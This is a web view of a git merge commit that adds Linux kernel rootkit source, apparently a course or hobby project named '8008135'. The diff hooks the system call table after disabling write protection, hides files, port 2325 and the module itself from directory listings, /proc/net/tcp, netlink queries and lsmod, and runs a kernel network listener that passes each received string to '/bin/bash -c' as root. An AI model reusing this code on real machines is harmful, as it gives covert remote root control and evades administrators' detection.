valentin_lechner
/
8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'master' into 'dev_jkr'

Browse Source 
Master

See merge request jan-koerner-enterprises/8008135!3
dev_jkr
Jan Körner 5 years ago
parent a598ee7319 be224f55a6
commit e41d698df1
17 changed files with 675 additions and 218 deletions
Show Stats Download Patch File Download Diff File

4
.gitignore vendored
Unescape Escape View File

@ -9,10 +9,10 @@ sysgen.h
*.a
*.ko
*.o
*5y563n.*
*~
*.symvers
*.order
.tmp_versions/
*.cmd
.vscode/
.vscode/

7
Makefile
Unescape Escape View File

@ -19,10 +19,15 @@ INCL_H := $(PWD)/$(INCL_S)/headers
obj-m += $(MNAME).o
# Core
$(MNAME)-y += src/$(MNAME).o
$(MNAME)-y += src/637d3n75.o
$(MNAME)-y += src/50ck3t.o
$(MNAME)-y += src/h1d3p0r7.o
$(MNAME)-y += src/h1d3m0dul3.o
$(MNAME)-y += src/p463unpr073c7.o
$(MNAME)-y += src/5y563n.o
# Includes for header files etc
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall
all:
$(shell $(SRCS_S)/cr3473_5y563n.sh)

49
src/50ck3t.c
Unescape Escape View File

@ -31,9 +31,22 @@
/**** includes *****************************************************************
*******************************************************************************/
#include "50ck3t.h"
#ifdef HARMLESS
#else
#include <linux/init.h>
#include "610b415.h"
#endif
/**** types *******************************************************************
*******************************************************************************/
#ifdef HARMLESS
#else
static char *SEnvP[] = {
"HOME=/",
NULL
};
#endif
struct tcp_conn_handler_data{
struct sockaddr_in *FAddress;
struct socket *FAcceptSocket;
@ -176,9 +189,10 @@ int connection_handler(void *AData){
int LRet;
int LLen = 49;
unsigned char LInBuf[LLen+1];
#ifdef HARMLESS
unsigned char LOutBuf[LLen+1];
#else
#endif
DECLARE_WAITQUEUE(recv_wait, current);
allow_signal(SIGKILL|SIGSTOP);
@ -221,21 +235,33 @@ int connection_handler(void *AData){
LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\
MSG_DONTWAIT);
if(LRet > 0){
if(memcmp(LInBuf, "HOLA", 4) == 0){
#ifdef HARMLESS
if(memcmp(LInBuf, "HOLA", 4) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "HOLASI");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
}
if(memcmp(LInBuf, "ADIOS", 5) == 0){
}
if(memcmp(LInBuf, "ADIOS", 5) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "ADIOSAMIGO");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
break;
}
}
#else
int Ret;
printk(LInBuf);
char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL};
printk("Calling usermodehelper");
Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC);
printk("\nRet is %i \n", Ret);
#endif
}
}
@ -309,10 +335,8 @@ int tcp_server_accept(void){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
pr_info("accept connection\n");
LAcceptErr =
LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK);
LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d while accepting "
@ -326,9 +350,8 @@ int tcp_server_accept(void){
addr_len = sizeof(struct sockaddr_in);
LAcceptErr =
LAcceptSocket->ops->getname(LAcceptSocket,\
(struct sockaddr *)LClient,\
LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket,
(struct sockaddr *)LClient,
&addr_len, 2);
if(LAcceptErr < 0){

20
src/610b415.c
Unescape Escape View File

@ -0,0 +1,20 @@
/*
* 610b415.c
*
* Created on: Dec 6, 2019
* Author: vlr
*/
#include "610b415.h"
char * stringRemoveChars(char *AString, char *ASpanset){
char *LPtr = AString;
LPtr = strpbrk(LPtr, ASpanset);
while(LPtr != NULL) {
*LPtr = ' ';
LPtr = strpbrk(LPtr, AString);
}
return AString;
}

74
src/637d3n75.c
Unescape Escape View File

@ -0,0 +1,74 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "637d3n75.h"
/*** var ********************************************************************
*******************************************************************************/
sys_getdents_ptr sys_getdents_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count){
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
boff += ent->d_reclen;
}
}
return ret;
}

196
src/8008135.c
Unescape Escape View File

@ -17,203 +17,61 @@
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "8008135.h"
#include "50ck3t.h"
/**** var ********************************************************************
*******************************************************************************/
sys_getdents_t sys_getdents_orig = NULL;
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count){
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
// if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
#if defined DEBUG
printk("\n hide prefix or mod name contained!\n");
printk("\n ret %ld\n ", ret);
printk("\n dbuf %d\n" , dbuf);
printk("\n");
printk(ent->d_name);
#endif
// remove this entry by copying everything after it forward
// and adjust the length reported
#if defined DEBUG
printk("\n reclen %u \n", ent->d_reclen);
#endif
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
#if defined DEBUG
printk("\n ret after change %ld\n ", ret);
#endif
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
/*** FUNCTION ****************************************************************
* NAME: hide port
* DESCRIPTION: hides the port 2325
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
read_ptr orig_read;
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
char *pathname, pbuf[256];
struct files_struct *current_files;
struct fdtable *files_table;
struct path file_path;
// run real read
result = (*orig_read)(fd,buf,count);
if (result <= 0)
return result;
// get pathname
// CITATION [8] from report
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path,pbuf,256*sizeof(char));
// if virtual file /proc/net/tcp
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
// copy from user to kernelspace;
if (!access_ok(VERIFY_READ,buf,result))
return -1;
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
return -1;
if (copy_from_user(kbuf,buf,result))
return -1;
// filter out hidden ports
start_line = strchr(kbuf,':') - 4; // skip first line
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
end_line = strchr(start_line,'\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
memmove(start_line,end_line + 1, // delete line in file
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE,buf,result))
return EINVAL;
if (copy_to_user(buf,kbuf,result))
return EINVAL;
kfree(kbuf);
}
// return number of bytes read
return result;
}
/*** FUNCTION ****************************************************************
* NAME: hide_module
* DESCRIPTION: hides the module from lsmod
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void hide_module(void){
list_del(&THIS_MODULE->list);
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_init
* DESCRIPTION: initializing Kernel Module
* DESCRIPTION: initializing Kernel Module - hijacking syscalltable
* PARAMETERS: -
* RETURNS: int
*******************************************************************************/
static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
orig_read = (read_ptr)sys_call_table[__NR_read];
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;
sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
wprotectionoff();
sys_call_table[__NR_getdents] = sys_getdents_new;
sys_call_table[__NR_read] = sys_read_fake;
sys_call_table[__NR_recvmsg] = my_recvmsg_syscall;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
wprotectionon();
printk(KERN_INFO "New syscall in place\n");
network_server_init();
hide_module();
printk(KERN_INFO "Module hidden");
return 0;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_exit
* DESCRIPTION: unloading Kernel Module
* DESCRIPTION: unloading Kernel Module, restoring the original system call table
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
static void __exit exit_8008135(void) {
network_server_exit();
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "Old syscall back\n");
wprotectionoff();
sys_call_table[__NR_getdents] = sys_getdents_orig;
sys_call_table[__NR_read] = sys_read_orig;
sys_call_table[__NR_recvmsg] = sys_recvmsg_orig;
wprotectionon();
}
// Setting pointers to init-/exit-functions
/*******************************************************************************/
module_init(init_8008135);
module_exit(exit_8008135);
/*******************************************************************************/

17
src/cr3473_5y563n.sh
Unescape Escape View File

@ -1,19 +1,32 @@
#!/usr/bin/env bash
SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
SRCS_H="$SCRIPTPATH""/headers"
SGENS="$SCRIPTPATH""/5y563n.c"
SGENH="$SRCS_H""/5y563n.h"
smap="/boot/System.map-$(uname -r)"
echo -e '#include "5y563n.h"' > "$SGENS"
echo -e "#pragma once" > "$SGENH"
echo -e "#include <linux/fs.h>" >> "$SGENH"
symbline=$(cat $smap | grep '\Wsys_call_table$')
set $symbline
[ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2;
echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH"
echo -e "extern void** sys_call_table;" >> "$SGENH"
echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS"
procline=$(cat $smap | grep '\Wproc_modules_operations$')
set $procline
echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH"
echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH"
echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS"

36
src/h1d3m0dul3.c
Unescape Escape View File

@ -0,0 +1,36 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3m0dul3.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide_module
* DESCRIPTION: hides the module from lsmod
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void hide_module(void){
list_del(&THIS_MODULE->list);
}

185
src/h1d3p0r7.c
Unescape Escape View File

@ -0,0 +1,185 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3p0r7.h"
/**** var **********************************************************************
*******************************************************************************/
sys_read_ptr sys_read_orig;
original_recvmsg_syscall sys_recvmsg_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide port
* DESCRIPTION: hides the port 2325
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
char *pathname, pbuf[256];
struct files_struct *current_files;
struct fdtable *files_table;
struct path file_path;
// run real read
result = (*sys_read_orig)(fd, buf, count);
if (result <= 0){
return result;
}
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path, pbuf, 256*sizeof(char));
if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
if (!access_ok(VERIFY_READ, buf, result)){
return -1;
}
if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
return -1;
}
if (copy_from_user(kbuf, buf, result)){
return -1;
}
start_line = strchr(kbuf, ':') - 4;
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
end_line = strchr(start_line, '\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
memmove(start_line, end_line + 1,
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE, buf, result)){
return EINVAL;
}
if (copy_to_user(buf, kbuf, result)){
return EINVAL;
}
kfree(kbuf);
}
// return number of bytes read
return result;
}
/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
`recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
socket with the help of some netlink utility macros. If a netlink socket is being used, we
iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
source and destination ports with our list of hidden ones. In order to hide an entry we copy
the remaining entries over it and adjust the data length which is returned to the user. */
asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
{
long ret;
struct nlmsghdr *nlh;
long count;
int found;
char *stream;
int offset;
int i;
struct inet_diag_msg *r;
int port;
/* Call original `recvmsg` syscall */
ret = sys_recvmsg_orig(sockfd, msg, flags);
/* Some error occured. Don't do anything. */
if (ret < 0)
return ret;
/* Extract netlink message header from message */
nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
/* Number of bytes remaining in message stream */
count = ret;
/* Set flag specifying whether message contains data to be masked */
found = 1;
/* NLMSG_OK: This macro will return true if a netlink message was received. It
essentially checks whether it's safe to parse the netlink message (if indeed
is a netlink message) using the other NLMSG_* macros. */
while (NLMSG_OK(nlh, count)) {
if (found == 0)
/* NLMSG_NEXT: Many netlink protocols have request messages that result
in multiple response messages. In these cases, multiple responses will
be copied into the `msg` buffer. This macro can be used to walk the
chain of responses. Returns NULL in the event the message is the last
in the chain for the given buffer. */
nlh = NLMSG_NEXT(nlh, count);
r = NLMSG_DATA(nlh);
port = ntohs(r->id.idiag_sport);
if(port == 2325){
/* Message contains data to be masked */
found = 1;
}else{
found = 0;
continue;
}
stream = (char *) nlh;
/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
offset = NLMSG_ALIGN((nlh)->nlmsg_len);
/* Copy remaining entries over the data to be masked */
for (i=0 ; i<count ; i++)
stream[i] = stream[i + offset];
/* Adjust the data length */
ret -= offset;
}
return ret;
}

10
src/headers/50ck3t.h
Unescape Escape View File

@ -16,8 +16,8 @@
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_50CK3T_H_
#define SRC_HEADERS_50CK3T_H_
#ifndef SRC_HEADERS_50CK3T_H
#define SRC_HEADERS_50CK3T_H
/**** includes *****************************************************************
*******************************************************************************/
@ -40,11 +40,15 @@
#include <net/inet_connection_sock.h>
#include <net/request_sock.h>
/**** defines *****************************************************************
*******************************************************************************/
#define DEFAULT_PORT 2325
#define DEFAULT_PORT_HEX "0915"
#define MAX_CONNS 16
#define MODULE_NAME "8008135"
int network_server_init(void);
void network_server_exit(void);
#endif /* SRC_HEADERS_50CK3T_H_ */
#endif

13
src/headers/610b415.h
Unescape Escape View File

@ -0,0 +1,13 @@
/*
* 610b415.h
*
* Created on: Dec 6, 2019
* Author: vlr
*/
#ifndef SRC_HEADERS_610B415_H_
#define SRC_HEADERS_610B415_H_
extern char * stringRemoveChars(char *AString, char *ASpanset);
#endif /* SRC_HEADERS_610B415_H_ */

68
src/headers/637d3n75.h
Unescape Escape View File

@ -0,0 +1,68 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
#ifndef SRC_HEADERS_637d3n75_H
#define SRC_HEADERS_637d3n75_H
/**** include ****************************************************************
*******************************************************************************/
#include <linux/module.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "5y563n.h"
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
#define __NR_getdents 78
/**** type ********************************************************************
******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[1];
};
typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
/*** var ********************************************************************
*******************************************************************************/
extern sys_getdents_ptr sys_getdents_orig;
extern asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
#endif

41
src/headers/8008135.h
Unescape Escape View File

@ -18,16 +18,24 @@
*/
#ifndef SRC_HEADERS_8008135_H
#define SRC_HEADERS_8008135_H
/**** Includes ***************************************************************
*******************************************************************************/
#include "637d3n75.h"
#include "50ck3t.h"
#include "h1d3m0dul3.h"
#include "h1d3p0r7.h"
#include "p463unpr073c7.h"
// To set module data
#include <linux/module.h>
// To communicate kernel
#include <linux/kernel.h>
/*
#include <linux/kallsyms.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "5y563n.h"
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <linux/net.h>
#include <linux/seq_file.h>
@ -36,20 +44,10 @@
#include <linux/version.h>
#include <net/tcp.h>
#include <net/udp.h>
*/
/**** Defines *****************************************************************
*******************************************************************************/
#define GETDENTS_SYSCALL_NUM 78
#define READ_SYSCALL_NUM 0
#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
#define HIDE_PORT "0915" // 2325 in Hexadecimal
/**** Modinfo ****************************************************************
*******************************************************************************/
@ -59,18 +57,5 @@ MODULE_AUTHOR("JanKoernerEnterprises");
MODULE_DESCRIPTION("8008135");
MODULE_VERSION("0.1");
/**** type *******************************************************************
*******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf,
size_t count);
#endif /* SRC_HEADERS_8008135_H */
#endif

30
src/headers/h1d3m0dul3.h
Unescape Escape View File

@ -0,0 +1,30 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3m0dul3_H
#define SRC_HEADERS_h1d3m0dul3_H
#include <linux/module.h>
#include <linux/kernel.h>
extern void hide_module(void);
#endif

62
src/headers/h1d3p0r7.h
Unescape Escape View File

@ -0,0 +1,62 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3p0r7_H
#define SRC_HEADERS_h1d3p0r7_H
/**** includes ****************************************************************
*******************************************************************************/
#include "50ck3t.h"
/* are those really all needed? */
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <linux/net.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/socket.h>
#include <linux/version.h>
#include <net/tcp.h>
#include <net/udp.h>
#include <linux/inet_diag.h> /* Needed for ntohs */
#define __NR_read 0
#define __NR_recvmsg 47
typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
char __user *buf,
size_t count);
typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
/**** var **********************************************************************
*******************************************************************************/
extern sys_read_ptr sys_read_orig;
extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count);
extern original_recvmsg_syscall sys_recvmsg_orig;
extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
#endif

33
src/headers/p463unpr073c7.h
Unescape Escape View File

@ -0,0 +1,33 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_p463unpr073c7_H
#define SRC_HEADERS_p463unpr073c7_H
#include <linux/module.h>
#include "asm/special_insns.h"
/**** defines *****************************************************************
*******************************************************************************/
#define WRITE_PROTECT_FLAG (1<<16)
extern void wprotectionoff(void);
extern void wprotectionon(void);
#endif

48
src/p463unpr073c7.c
Unescape Escape View File

@ -0,0 +1,48 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "p463unpr073c7.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: wprotectionoff
* DESCRIPTION: turn page write protection off
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionoff(void){
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
}
/*** FUNCTION ****************************************************************
* NAME: wprotectionon
* DESCRIPTION: turn page write protection on
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionon(void){
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
}
Write Preview
Loading…
Cancel
Save